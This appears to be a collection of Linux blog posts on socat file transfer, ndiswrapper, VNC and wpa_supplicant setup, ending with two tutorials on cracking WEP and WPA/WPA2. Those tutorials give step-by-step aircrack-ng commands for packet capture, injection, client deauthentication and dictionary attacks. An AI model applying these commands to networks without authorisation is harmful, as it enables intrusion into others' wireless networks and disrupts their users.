Linux: Transmitting a Bunch of Files using socat

socat is a nifty, versatile tool for establishing a secure data channel between two computers. To install socat on Debian, use apt-get:

apt-get install socat

I was trying to use socat and tar to duplicate the contents of an entire filesystem securely between two computers. In this case, I copied all files in partition /dev/sda5 on box A to partition /dev/sdb6 on box B (IP 192.168.200.83).

Using the SCTP protocol

This method does not involve encryption, so it is relatively simple to follow.

1. First, I opened a terminal at box B (192.168.200.83) and changed the current directory to /mnt/sdb6 where I will unpack the incoming stream of files.

   
   

   cd /mnt/sdb6

   
   

   Then, I typed the following command to have socat establish a SCTP connection listening on port 7749. tar would be expecting to receive incoming files.

   
   

   socat EXEC:"tar xzf -" SCTP4-LISTEN:7749

   
   

2. Then, I opened a terminal at box A. Here I would transmit a bunch of files to box B (192.168.200.83). I changed directory to /mnt/sda5 containing files to send.

   
   

   cd /mnt/sda5

   
   

   Then, I typed the following command to transmit all the files in the current directory.

   
   

   socat EXEC:"tar czf - ." SCTP4-CONNECT:192.168.200.83:7749

   
   

Using the SSL connection

This method involves encrypted connection and requires SSL certicates on both sides of the link. Read this post to learn how to create self-signed SSL certificates if you don't already have one.

1. Debian and Ubuntu automatically create a local SSL certificate at /etc/ssl/certs/ssl-cert-snakeoil.pem. Both parties of an SSL connection — box A and box B — should exchange each other's ssl-cert-snakeoil.pem in order to have SSL connections between them.
   
   
   
2. On box B, I typed the following command to run socat in SSL listening mode at port 7749.
   
   

   cd /mnt/sdb6
   socat EXEC:"tar xzf -" OPENSSL-LISTEN:7749,reuseaddr,cert=/etc/ssl/certs/ssl-cert-snakeoil.pem,key=/etc/ssl/private/ssl-cert-snakeoil.key,cafile=box-A.pem

   
   
   
3. On box A, I typed the following command to run socat in SSL mode while running tar to pack all the files and send them through the pipeline.
   
   

   cd /mnt/sda5
   socat EXEC:"tar czf - ." OPENSSL:192.168.200.83:7749,cert=/etc/ssl/certs/ssl-cert-snakeoil.pem,key=/etc/ssl/private/ssl-cert-snakeoil.key,cafile=box-B.pem

   
   
   

Thus I have duplicated the whole directory tree from Box A to Box B. Using socat and tar, I was able to mirror a filesystem over the network. As shown above, socat alone can be a good substitute in situations where ssh, scp and/or netcat are needed. socat has many other features I have yet to explore.

To Compile ndiswrapper 1.58rc1 for Linux 3.5.4

ndiswrapper allows Linux users to use Windows drivers for PCI/USB network adapters on Linux. If you own a network device for which Linux support is still absent or premature, then you need to compile ndiswrapper yourself and install Windows driver for your network device. Fortunately, today's Linux supports most network devices out-of-box, so most distributions don't bother to include ndiswrapper. However, I am compiling ndiswrapper believing that Windows NDIS drivers would outperform native Linux drivers.

To my surprise, building the latest version of ndiswrapper (1.58rc1) did not require any patch. After compiling Linux 3.5.4, I downloaded the ndiswrapper source from the sourceforge site. I chose the testing version because I thought it would work better with Linux 3.5.x. I unpacked the source.

tar xzvf ndiswrapper-1.58rc1.tar.gz
cd ndiswrapper-1.58rc1

I typed the following commands to compile and install ndiswrapper.

KVERS=3.5.4 make uninstall
KVERS=3.5.4 make
KVERS=3.5.4 make install

Then, I generated modules.* files again.

depmod -e -m -F /boot/System.map-3.5.4 3.5.4

The following files were installed by ndiswrapper.

/lib/modules/3.5.4/misc/ndiswrapper.ko
/sbin/loadndisdriver
/usr/sbin/ndiswrapper
/usr/sbin/ndiswrapper-buginfo
/usr/share/man/man8/loadndisdriver.8
/usr/share/man/man8/ndiswrapper.8

Also read:

• Linux: Installing Windows Vista/7 Wireless Driver for use with ndiswrapper
  
• Linux: To Compile wpa_supplicant on Debian 3.1 Sarge
  

VNC4 vs TightVNC

A frequent question people have when setting up and using VNC is what differences are there between VNC4 and TightVNC. These differences are summarized in the table below.

	VNC4	TightVNC
Developer	RealVNC Limited	TightVNC.com
License	Only free edition is open-source	Open-source
Platfrom	Windows, Linux	Windows, Linux
Installed Size	4648 KB	1432 KB
Linux Dependencies	libsm6, libstdc++6, libxext6, zlib1g	libxext6, libjpeg62, zlib1g
Supported Encodings	ZRLE, Hextile, Raw	copyrect, tight, hextile, zlib, corre, rre, raw
Inetd supported mode	Wait, Nowait	Nowait
Shared Sessions from Inetd	Shared, Non-shared	Non-shared

Manually Starting a VNC Server

Manually starting a VNC server is necessary for testing VNC. Once you got VNC to work correctly, you can copy the command line to a script or inetd.conf. First, I created an executable script ~/.vnc/xstartup with the following contents:

#!/bin/sh

exec /etc/X11/Xsession

This file has to be made executable, of course. Prior to starting vnc4server, make sure your X session can start normally by checking your ~/.xsession file. My .xsession file looks like this:

#!/bin/sh

exec openbox

Then, I started vnc4server:

vnc4server -geometry 800x600 -depth 16 -name VNC4

The first time you run vnc4server, it will ask you for the password. Create a password that only you can guess and memorize it. Next, I installed TightVNC U3 package on my Sandisk U3 flash. I went over to another PC running Windows and plugged in my USB flash. The U3 menu popped up and I clicked on the TightVNC icon. Then, I specified the address of my Linux box running vnc4server:

192.168.1.234:1 or

192.168.1.234::5901

After I was done with vnc session, I killed the vnc4server with the following command:

vnc4server -kill :1

When vnc sessions don't seem working, check the log file: ~/.vnc/*.log

Related Posts

• Remote Desktop Session with VNC4Server & TightVNC
  
• Connecting to a VNC Server through a SSH Tunnel
  

Connecting to a VNC Server through a SSH Tunnel

For security and privacy, VNC connection should be done through a SSH tunnel. Here, I am using Putty to set up a SSH Tunnel. First, type in the host name:

Next, type in the user name:

Check the following options. Also, move Blowfish up for speed:

Set up a SSH tunnel. The Source port will be the local port through which the VNC viewer will connect. The destination port is the remote port whereby the VNC server listens. Click Add button:

Save the Putty session.

Now that you set up a SSH tunnel, you can use a VNC viewer like TightVNC to connect through the SSH tunnel to the remote VNC server. For example, specify localhost::5900 as the server host to TightVNC.

Related Posts

• Remote Desktop Session with VNC4Server & TightVNC
  
• Manually Starting a VNC Server
  

Remote Desktop Session with VNC4Server & TightVNC

We are in a computing era in which we run applications from a remote computer or server. There are many ways for us to have remote desktop sessions. RDP, NX and VNC all are protocols designed to implement remote desktops. Of those, VNC is the most used and supported. This post is about many ways of setting up and using VNC in Linux and Windows. Below I explain how I set up a VNC remote session between my Linux box and a TightVNC viewer running on a Windows PC.

Setting up Inetd to start VNC on Incoming Connections

First, I installed vnc4server on my Debian Linux box. Alternatively, I could install tightvncserver instead. TightVNC is lighter than vnc4server. Anyway, to have inetd automatically start a VNC server on incoming connections, I added the following line to my /etc/inetd.conf file. This is all one line:

5995 stream tcp,rcvbuf=64k,sndbuf=256k wait nobody:nogroup /usr/bin/Xvnc Xvnc -inetd -query localhost -once -geometry 960x600 -depth 16 -AlwaysShared -rfbauth /etc/vnc/passwd -desktop myOffice -dpi 96 -fp /usr/share/fonts/X11/Type1 -co /etc/X11/rgb

For tightvncserver, the inetd.conf line would look slightly different because tightvncserver panics when wait is used instead of nowait. This means that tightvncserver sessions can never be shared when started from inetd:

5960 stream tcp,rcvbuf=64k,sndbuf=256k nowait nobody:nogroup /usr/bin/Xvnc Xvnc -inetd -query localhost -once -geometry 960x600 -depth 16 -desktop myOffice -dpi 96 -fp /usr/share/fonts/X11/Type1 -co /etc/X11/rgb

Typical port values are in the range from 5900 to 5999. Make sure everything in the following checklist is OK for VNC to work:

• A display manager, such as gdm, kdm, xdm or wdm, must be running and set up to accept XDMCP requests. Read the sections below about setting up XDMCP for VNC sessions.
  
• A VNC password must be created and stored in the readable file /etc/vnc/passwd. To create it, run:
  
  

  vncpasswd
  
  mkdir /etc/vnc
  
  mv ~/.vnc/passwd /etc/vnc
  
  chmod 644 /etc/vnc/passwd

  
  
• At least, fixed and cursor fonts must be present in the default font paths. If not, specify the font paths with -fp parameter.
  

Tell inetd to reload settings in /etc/inetd.conf with the following command:

kill -1 $(pidof inetd)

Setting up GDM to handle VNC logins

It is rather simple to make GDM accept XDMCP requests from a VNC server. Open the file /etc/gdm/gdm.conf and add the following lines in the [XDMCP] section:

[xdmcp]

Enable=true

Port=177

DisplaysPerHost=8

The lines above enable GDM to accept logins at UDP port 177. Also, GDM is set up to accept up to 8 users from localhost. Otherwise, GDM may refuse remote logins through SSH tunnel when there are already a couple of users logged in at localhost.

For security, it is recommended to add the following line to /etc/hosts.deny:

gdm: ALL

Then, add the following line to /etc/hosts.allow:

gdm: 127.0.0.1

Setting up XDM for use with VNC

XDM is lighter than gdm or kdm, so XDM is ideal for VNC sessions where network bandwidth and CPU resource are precious. In fact, XDM can coexist with gdm or kdm. In Debian, set HEED_DEFAULT_DISPLAY_MANAGER to false in the script /etc/init.d/xdm:

[ -z "$HEED_DEFAULT_DISPLAY_MANAGER" ] && HEED_DEFAULT_DISPLAY_MANAGER=false

To set up XDM to handle VNC logins and deliver a user's desktop, XDMCP support has to be enabled first. Open the file /etc/X11/xdm/xdm-config and locate the following line:

DisplayManager.requestPort: 0

Change the number 0 to 177. Then, open the file /etc/X11/xdm/Xaccess and specify the range of addresses to allow access to XDM. Usually, it is sufficient to add only the following lines to /etc/X11/xdm/Xaccess:

localhost

127.0.0.1

Optionally, you can change the look of the login screen. Open the file /etc/X11/xdm/Xsetup and enter a command to set the background image:

#!/bin/sh

hsetroot -fill /usr/local/share/pixmaps/Repressed.jpg

You can also change the welcome line and the face image by editing the file /etc/X11/xdm/Xresources:

xlogin*greeting: Remote VNC Session

xlogin*logoFileName: /usr/share/X11/xdm/pixmaps/xorg.xpm

Using TightVNC in Windows to Run a Linux Destop

I installed TightVNC U3 package on my USB thumbdrive so I can connect to my VNC server anywhere. However, I had to tweak TightVNC a little bit to open a VNC session to my Linux desktop.

The default encoding Tight doesn't work well with vnc4server. So I had to change it to CoRRE.

Related Posts

• Manually Starting a VNC Server
  
• Connecting to a VNC Server through a SSH Tunnel
  

Linux: Connecting to Wireless Networks with wpa_supplicant

Connecting to a wireless network in Linux is easy with wpa_supplicant. If you haven't, install the wpasupplicant package first. Also, install wireless-tools.

Of course, the driver for the wireless adapter has to be installed and loaded too. You can either use Linux native driver or Windows NDIS driver for your wireless device. The Linux kernel itself provides native driver modules for popular wireless chips. Alternatively, you can use a Windows driver in Linux with the help of ndiswrapper. I prefer using ndiswrapper to enable my wireless adapters. Once ndiswrapper is configured correctly, the following command will load the driver for the wireless network adapter.

modprobe ndiswrapper

In order to be able to control wpasupplicant with wpa_cli and wpagui, you should add useself to the netdev group.

adduser username netdev

To automatically have wpasupplicant take care of wireless connections, you should edit two files, /etc/network/interfaces and /etc/wpa_supplicant/wpa_supplicant.conf. The following is a sample /etc/network/interfaces file.

auto lo wlan1

iface lo inet loopback

iface default inet dhcp

iface WPA_hidden inet static
        address 192.168.1.250
        netmask 255.255.255.0
        network 192.168.1.0
        broadcast 192.168.1.255
        gateway 192.168.1.1

iface wlan1 inet manual
        wpa-driver wext
        wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf

Then, you need to create a configuration file /etc/wpa_supplicant/wpa_supplicant.conf. Its contents typically looks like this:

ap_scan=1
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev

network={
        ssid="MyWifiNet"
        scan_ssid=1
        key_mgmt=WPA-PSK
        proto=WPA
        pairwise=TKIP
        group=TKIP
        psk="WPA password"
        id_str="WPA_hidden"
}

network={
        ssid="linksys"
        key_mgmt=NONE
        wep_key0=e2c45314910abf72e871beda87
        wep_tx_keyidx=0
}

In the example above, the ssid= and psk= lines should to be adjusted for each wireless network. The second nework linksys is an example of WEP networks. Next, run the following command to start a WPA connection to your wireless network.

wpa_supplicant -c /etc/wpa_supplicant.conf -i wlan1 -B

The steps below finalize wirless network setup.

ifconfig wlan0 192.168.1.201 up

route add default gw 192.168.1.1

Additionally, check the contents of /etc/resolv.conf which set up DNS servers.

To Kill WPA_supplicant

To terminate wpa_supplicant, execute wpa_cli and type the following commands:

terminate
quit

Hacking WEP with Backtrack 3

Today, we commonly find wireless networks around us. Most wireless networks are encrypted using WEP or WPA encryption methods. I covered the dictionary attack on WPA networks in a previous post. Compared to WPA, WEP has weak mechanism and is easy to crack.

Theory

At the time of conception, WEP, short for wired equivalent privacy, was believed to be secure. However, a security flaw was found in the IV headers of data packets that makes it possible to crack WEP if enough IV headers are collected. This tutorial takes advantage of this weakness in the initialization vectors of wireless packets to crack WEP. However, a problem may arise when there are multiple keys in use instead of just one.

What's Needed To Test Your Wireless Network

To crack WEP, you need a Backtrack CD and basic knowledge of Linux. Backtrack is a set of tools for testing network security. Download Backtrack and burn it onto a black CD with InfraRecorder or any other tool.

Then, boot your computer with the Backtrack CD. Hopefully, you'll be automatically presented with a nice and dark GUI screen of KDE.

Surveying Wireless Networks with Kismet

Launch Konsole which is located right next to the KDE Start menu. Open /usr/local/etc/kismet.conf in a text editor and edit the source= line to include your wireless device. For example, for Broadcom 43xx based card, put source=bcm43xx,eth1,bcm43xx. Save kismet.conf and start kismet.

Once kismet starts detecting wireless networks around, press s and P to sort the network list by packet counts in descending order. Press Up or Down key to move to the target network and press i for network information or c for client list. Write down such information as:

• ESSID (wireless network name)
  
• BSSID (MAC address of access point)
  
• channel of wireless network
  
• MAC address of clients
  

In Kismet, the flags for encryption are Y (WEP), N (No encryption), or O (WPA/WPA2). Press x to close popup windows and Q to exit Kismet.

Dumping Wireless Traffic with Airodump

To hack WEP, you need to use airodump-ng to sniff wireless traffic of the target network and collect good IV's (initialization vectors, a part of WEP encryption data). Type the following commands in a terminal window:

airmon-ng stop wlan0

airmon-ng start wlan0

airodump-ng -w logfile -c 9 --ivs wlan0

The commands above put the network device wlan0 in monitor mode and then use airodump-ng to log the wireless traffic. The -c option specifies the channel to listen to. The screen will show wireless networks and associated clients, if any, with a set of numbers increasing. Don't stop airodump-ng or close the terminal yet. Just leave the terminal open.

Using Aireplay-NG To Generate Traffic

Aireplay-ng is a handy tool that can be used to generate more wireless traffic in order to collect enough good IV's. It does so by injecting or replaying captured packets to fool the access point into giving us what we need.

To Force Association of Clients with Access Point

Open another terminal and enter the following command to associate the target wireless client with the access point:

aireplay-ng -1 30 -e belkin -a 00:11:22:33:44:55 -h 00:fe:21:83:f4:e5 wlan0

The -e option specifies the network name, the -a option specifies the MAC address of the AP, and the -h option specifies the MAC address of the wireless client.

You can use macchanger to view and change your MAC address, for example, macchanger -s wlan0. Then, you can associate your wireless adapter when there are no clients connected to the wireless network in the first place.

ARP Injection with Aireplay

ARP injection is slow but always works. While airodump-ng is listening, run the following command:

aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:21:83:f4:e5 wlan0

Whereas the -b option specifies the MAC address of the AP and -h specifies MAC address of the associated client. Let it run and airodump-ng will pick up traffic. If no client is connected, we can create one by fake authentication described above.

Interactive Packet Replay

This attack generates traffic by asking the access point to resend data packets.

aireplay-ng -2 -b <AP> -h <Client MAC> -n 160 -p 0841 -c FF:FF:FF:FF:FF:FF wlan0

Aircrack in Action

After collecting enough IV packets, aircrack-ng can be used to crack the WEP key. The syntax of the aircrack-ng command to use is like:

aircrack-ng -a 1 -b A0:B1:C2:D3:E4:F5 -n 128 logfile-01.ivs

Replace the filename with your log file that was previously generated with airodump-ng. Also, specify the access point's MAC address with -b option. The -n option specifies whether the WEP strength is 64-bit or 128-bit. The -a 1 option specifies that we're cracking WEP.

Can't Crack?

If you still can't crack WEP with tons of IV's, increase the fudge factor with -f N option (N>=2). It'll take much longer to crack but you'll have a better chance at success.

Related Posts

• Hacking WPA/WPA2 with Backtrack 3
  

Hacking WPA/WPA2 with Backtrack 3

WPA is an encryption scheme designed to secure the wireless network of your home or office from intruders and eavesdroppers. It is reportedly safer than WEP. There have been numerous attempts to break WEP and WPA encryption with mixed results. This tutorial discusses currently available techniques for testing the wireless network security. Be aware that breaking into your neighbor's network without permission is wrong.

What You Need

To test security of wireless networks, you can use the live CD Linux distribution called Backtrack. You can download its latest ISO image from Remote-Exploit.org and burn it with any CD burner program like InfraRecorder or CDBurnerXP. Alternatively, you can try the SliTaz Aircrack-NG distribution which is lighter and simpler than Backtrack.

Here's a list of what you need to crack WPA/WPA2:

• a very powerful computer
  
• a wireless card/adapter supported by Aircrack-NG
  
• Backtrack or SliTaz Aircrack-ng Distro
  
• A little knowledge of Linux
  
• Optional: WPA-PSK Rainbow Tables (7 GB or 33 GB)
  
• Optional: coWPAtty program
  

Reboot your computer with a Backtrack CD and you'll be presented with the KDE environment.

Surveying Wireless Networks with Kismet

Launch Konsole which is located right next to the KDE Start menu. Open /usr/local/etc/kismet.conf in a text editor and edit the source= line to include your wireless device. For example, for Broadcom 43xx based card, put source=bcm43xx,eth1,bcm43xx. Refer to Kismet documentation section 12. Save kismet.conf and start kismet.

Once kismet starts detecting wireless networks around, press s and P to sort the network list by packet counts in descending order. Press Up or Down key to move to the target network and press i for network information or c for client list. Write down such information as:

• ESSID (wireless network name)
  
• BSSID (MAC address of access point)
  
• channel of wireless network
  
• MAC address of clients
  

Press x to close popup windows and Q to exit Kismet.

Brute-Force Dictionary Attack

This is the classic brute-force attack.

airmon-ng stop wlan0

airmon-ng start wlan0

The commands above put your wireless device in monitor mode. The monitor mode is the mode whereby your wireless card can listen to wireless traffic passively. Replace wlan0 with your wireless device name, such as eth1. Type iwconfig to make sure your card is in monitor mode.

airodump-ng -w test wlan0

Skip the step above if you used Kismet as in the previous section. Here airodump-ng is used to survey the wi-fi networks. Press Ctrl+C to stop airodump-ng. Copy BSSID (MAC address) of the target network.

airodump-ng -w logfile -c 3 --bssid A0:B1:C2:D3:E4:F5 wlan0

Sniff and log the target network (specified with --bssid option) on the specified channel (-c option) to the specified log file (-w option). Wait until WPA Handshake message appears on the screen. Then, stop airodump-ng by pressing Ctrl+C.

Optionally, if you see a client connected to the target network but no authentication handshake, then you can deauthenticate the client by running the following example command in a separate terminal:

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0

where -a option specifies the access point and -c option specifies the client to deauthenticate. Hopefully, the command above will trick the client to renegotiate a 4-way authentication handshake with the access point. Otherwise, you'll have to wait until a handshake message shows up on airodump-ng outpout.

zcat /pentest/password/pico/cowpatty/final-wordlist.txt.gz > /tmp/wordlist.txt

aircrack-ng -a 2 -w /tmp/wordlist.txt logfile*.cap

Begin a brute-force dictionary attack using the saved log file(s) and the specified dictionary (-w option). Aircrack-ng will try every word in the dictionary until the correct passphrase is found. It may take hours or several days depending on the size of dictionary and the speed of your CPU to try every word in the dictionary. However, if the passphrase is not found in the dictionary or made up of random alphanumeric characters, then you are out of luck and just wasting your time. In this case, the dictionary attack won't be any good.

Finding a Good Dictionary

You need a good dictionary to crack WPA. Backtract 3 CD has wordlist files at the following locations:

/usr/local/john-1.7.2/password.lst

/pentest/fuzzers/spike/src/password.lst

/pentest/fuzzers/spike/src/wordlist

/pentest/password/pico/cowpatty/final-wordlist.txt.gz

/pentest/wireless/aircrack-ng/test/password.lst

/pentest/wireless/eapmd5pass/sample-wordlist.txt

/opt/windows-binaries/wordlist.txt.gz

Also, aircrack FAQ page has an extensive list of places where you can download good wordlists from. In addition, I found a good wordlist called 9-final-wordlist.zip here.

Further Readings

• More on WPA/WPA2
  
• Ars Technica: Battered, but not broken: understanding the WPA crack
  
• Practical Attacks against WEP and WPA, PDF
  
• Hacking WEP with Backtrack 3